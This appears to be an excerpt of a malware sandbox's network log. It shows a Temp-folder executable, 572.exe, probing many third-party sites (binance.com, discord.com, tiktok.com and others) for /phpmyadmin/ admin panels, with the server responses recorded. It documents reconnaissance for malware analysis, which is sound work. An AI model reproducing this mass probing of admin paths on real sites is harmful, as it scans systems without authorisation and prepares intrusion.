2024-02-05 11:14:51 UTC | 610 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: https://xsaniime.com/phpmyadmin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s16GfKi4aQTgc6K%2BN8T6rZ5ZFHenWcRG5cgXPg7iZmdvz13mh98z1oE3MzdPJlTpJOus2QT5wyEjTNtJ%2B0qX45R37vgbIbFfYdMMMxp67s7bKEi0gKSHyvN8uaQa6oJp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb6fba536730-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 55102 | 185.51.191.48 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 185 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 523 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=e93f0d266333bc2748248aad8489a773; expires=Tue, 06-Feb-2024 11:14:50 GMT; Max-Age=86400; path=/
Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:50 GMT; Max-Age=86400
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-02-05 11:14:51 UTC | 7669 | IN
Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/cs
2024-02-05 11:14:51 UTC | 5491 | IN
Data Ascii: rivacy Policy</a><a href="javascript:void();" onClick="$('#law_cookie_alert_more').fadeIn(150);$('#law_cookie_alert_more_close').fadeIn(100);">More information</a><a href="/en/adatvedelem_cookie_tiltva">I do not accept</a></div><div id="
2024-02-05 11:14:51 UTC | 2 | IN | Data Raw: 0d 0a
Data Ascii:
2024-02-05 11:14:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 55712 | 104.21.5.25 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 159 | OUT | GET / HTTP/1.1
Host: terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 765 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zR2GSD8KwUph09fC4xogSkI%2Bis%2BeG5MqGc2jkuMnnP4m5Gg%2FYvZfk%2F39P3jTovB%2FX2JJmapsM7NAf9ZSw1IA6RyQYkol%2BbM%2FCU7Vi1BjlLLY%2FQIG5RCjgpfLeGw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abb70df05b166-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:51 UTC | 604 | IN
Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: IE 9]> <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--></head><body><script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-545b9cf52718a43c" async></script><script> win
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: -hover="dropdown" data-delay="0" data-close-others="false">Productos <b class=" icon-angle-down"></b></a><ul class="dropdown-menu"><li><a href="vision.html">Visin General</a></li><li><a href="ternanet.html">TernaNet</a></li><li><a href="ternaschool.
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: ones y Precios</a></li><li><a href="contactopromo">Contacto</a></li></ul></div></div></div></header><section id="featured"><div class="container"><div class="row"><div class="col-lg-12"><div id="main-slider" class="flexslider"><ul class="s
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: iv class="container"><div class="row"><div class="col-lg-3"><div class="alert alert-success"><h4>Nuestra Solucin</h4><p>Ofrecer una plataforma lista, amplia y estable para instituciones de educacin.</p></div></div><div class="col-lg-9"><h4>La
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: n en un proceso sencillo y rpido.</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Rapidez</h4><div class="icon"> <i class="fa fa-clock-o fa-3x"></i> </div><p>Reduce el tiempo en los procesos ma
2024-02-05 11:14:51 UTC | 1369 | IN
Data Ascii: ><h4>Trabaje cmodamente</h4><div class="icon"> <i class="fa fa-smile-o fa-3x"></i> </div><p>Se eleva la eficiencia en el desempeo del personal de control de estudios</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 6c 65 73 20 61 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 24 28 22 2e 74 6f 6f 6c 74 69 70 2d 65 78 61 6d 70 6c 65 73 20 73 70 61 6e 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: les a").tooltip({ placement : 'bottom' });$(".tooltip-examples span").tooltip({ placement : 'bottom' });});</script><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r]
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC254INData Raw: 69 74 69 6f 6e 29 2f 62 6f 74 74 6f 6d 5f 6c 65 66 74 2f 28 6d 61 29 2f 62 72 2f 28 68 69 64 65 5f 6f 66 66 6c 69 6e 65 29 2f 74 72 75 65 2f 28 74 6f 70 29 2f 33 35 30 2f 28 75 6e 69 74 73 29 2f 70 69 78 65 6c 73 2f 28 6c 65 61 76 65 61 6d 65 73 73 61 67 65 29 2f 74 72 75 65 2f 28 74 68 65 6d 65 29 2f 31 3f 72 3d 27 2b 72 65 66 66 65 72 65 72 2b 27 26 6c 3d 27 2b 6c 6f 63 61 74 69 6f 6e 3b 0d 0a 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ition)/bottom_left/(ma)/br/(hide_offline)/true/(top)/350/(units)/pixels/(leaveamessage)/true/(theme)/1?r='+refferer+'&l='+location;var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);})();</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
41  192.168.2.6  54872  18.200.3.224  443  524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  174  OUT  GET /phpmyadmin/ HTTP/1.1
Host: hero-wars.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  200  IN  HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.hero-wars.com/phpmyadmin/
2024-02-05 11:14:51 UTC  162  IN  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
42  192.168.2.6  54892  82.221.28.171  443  524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  166  OUT  GET /phpmyadmin/ HTTP/1.1
Host: uh.is
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  256  IN  HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.uh.is/phpmyadmin/
Strict-Transport-Security: max-age=31536000; includeSubdomains
2024-02-05 11:14:51 UTC  162  IN  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
43  192.168.2.6  54853  162.241.203.30  443  524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  175  OUT  GET /phpmyadmin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  262  IN  HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Content-Length: 2361
Vary: Accept-Encoding
Content-Type: text/html
2024-02-05 11:14:51 UTC  2361  IN  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="tel


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
44  192.168.2.6  55111  172.66.43.117  443  524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  173  OUT  GET /phpmyadmin/ HTTP/1.1
Host: login.adf.ly
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  904  IN  HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
set-cookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoe; path=/; domain=adf.ly; HttpOnly; SameSite=Lax; secure
expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: adfly
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: /
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P02FTpBWkltv8XB5VgPtlvAi0hvlHGf%2BVnGMigGD2FEASXp9j%2FCwA4otZHfhM8d4P3HaqW7iG3K51Dy4dufqds%2Fm0SGd5XfWKZUOvodA2qKIRWqcp98B%2FJA0WJ1YiG0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb709d376755-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                45192.168.2.6545943.161.136.69443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC701INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 66
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: 2a778666d5de4c98bceb3daa903372a5
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4b4ef7cefd8f81a1e60437d0590406b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: _65Of6HlAJHGJEJdERKAkQRIMnA5FXAK0swYKQW3WUhs-OHQxFisDA==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC66INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 62 69 6e 61 6e 63 65 2e 63 6f 6d 2f 65 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://accounts.binance.com/en/phpmyadmin/">Found</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                46192.168.2.652157200.108.110.164443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC189OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=f56319426a963327daf28d8a75c39ca1af53e110; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://midetuvelocidad.claro.com.pe/
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC15836INData Raw: 31 64 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1dd8<!doctype html><html class="no-js" lang="es" xml:lang="es"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC15967INData Raw: 6d 61 69 6e 2d 66 6f 6f 74 65 0d 0a 32 30 30 30 0d 0a 72 5f 5f 70 72 69 76 61 63 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 69 64 61 64 22 3e 50 6f 6c c3 ad 74 69 63 61 20 64 65 20 70 72 69 76 61 63 69 64 61 64 3c 2f 61 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 66 6f 6f 74 65 72 5f 5f 70 72 69 76 61 63 79 5f 5f 73 65 70 61 72 61 74 6f 72 22 3e 7c 3c 2f 73 70 61 6e 3e 20 3c 61 20 68 72 65 66 3d 22 2f 63 6f 6e 64 69 63 69 6f 6e 65 73 22 3e 54 c3 a9 72 6d 69 6e 6f 73 20 79 20 63 6f 6e 64 69 63 69 6f 6e 65 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: main-foote2000r__privacy"> <a href="/privacidad">Poltica de privacidad</a> <span class="main-footer__privacy__separator">|</span> <a href="/condiciones">Trminos y condiciones</a> </p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 55107 | 54.158.51.60 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: ucv.blackboard.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 1583 | IN | HTTP/1.1 200
Access-Control-Allow-Origin: https://ucv.blackboard.com
Cache-Control: private
Cache-Control: max-age=0
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-control: no-cache="set-cookie"
Content-Language: es-ES
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html;charset=UTF-8
Date: Mon, 05 Feb 2024 11:14:51 GMT
Expires: Sun, 05 Feb 2023 11:14:51 GMT
Last-Modified: Thu, 05 Feb 2004 11:14:51 GMT
P3P: CP="CAO PSA OUR"
Pragma: private
Set-Cookie: JSESSIONID=A9A02D9FB3DF75193077ED2D9D9EEDA6; Path=/; Secure
Set-Cookie: BbRouter=expires:1707142491,id:FD1371448EE0A85D04E713BCA22F73E0,signature:f8d1ef1e1e594172b6bd4570206464814f365f267c7910add598f8c19b134836,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:da65842d-7792-4117-8140-5d4ca0507355; Path=/; Secure; HttpOnly
Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74491601D743418BDE5DF3CAB4B80021F6C6D167CCB4B2721CBC847670EB6882993042CB9AE5FF5E6B2476353C64427E9A9;PATH=/;MAX-AGE=900
Set-Cookie: AWSELBCORS=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74491601D743418BDE5DF3CAB4B80021F6C6D167CCB4B2721CBC847670EB6882993042CB9AE5FF5E6B2476353C64427E9A9;PATH=/;MAX-AGE=900;SECURE;SAMESITE=None
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Vary: Accept-Encoding
Vary: Origin
X-Blackboard-appserver: ip-10-146-212-88.ec2.internal
X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
transfer-encoding: chunked
Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 54614 | 162.159.136.232 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 172 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 1147 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 0
Connection: close
Location: https://discord.com/phpmyadmin
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Permissions-Policy: interest-cohort=()
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FfJNJF6iWpcBSlcy8G8NPGFjC1klpQNqzAVi%2FtRY%2B5y%2Fs8PV%2BrNeOY6TyNcHBwgPNrO3T%2BRhpmtBoqDvU86cG%2Bo8Bo7oTYz%2BU9WRJeQTBi7BCZocMFIXoTYfNpoG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=mivNSf9oSiUKRxcfKY9K4iNJWXfyltRN7WeaBq4UOdM-1707131691764-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb717897674a-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
49          192.168.2.6  54874        13.249.120.86   443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  171                OUT        GET /phpmyadmin/ HTTP/1.1
Host: tiktok.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC  466                IN         HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Length: 0
Connection: close
Location: https://www.tiktok.com/phpmyadmin/
X-Cache: FunctionGeneratedResponse from cloudfront
Via: 1.1 8c912994a20734267c55d1a8cbbbe60e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL51-C1
X-Amz-Cf-Id: PfuIEYoc3M-9sJ7AsdBv7aMxntMiN5Z-FAUyNOWDfHCyk7z8N5DvjA==
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
50          192.168.2.6  54890        45.60.0.44      443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  176                OUT        GET /phpmyadmin/ HTTP/1.1
Host: m.codere.com.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  763                IN         HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: close
Content-Length: 1245
Set-Cookie: visid_incap_2786379=P6p5ySXxTI29D8eLDfOFoSvDwGUAAAAAQUIPAAAAAABWDxaPAifAZENIvBKIunF8; expires=Tue, 04 Feb 2025 10:21:10 GMT; HttpOnly; path=/; Domain=.codere.com.co
Set-Cookie: nlbi_2786379=5VIKOclosivXbhQKaJQkpgAAAABHFBG4vdmuxy6mQSvsEhco; path=/; Domain=.codere.com.co
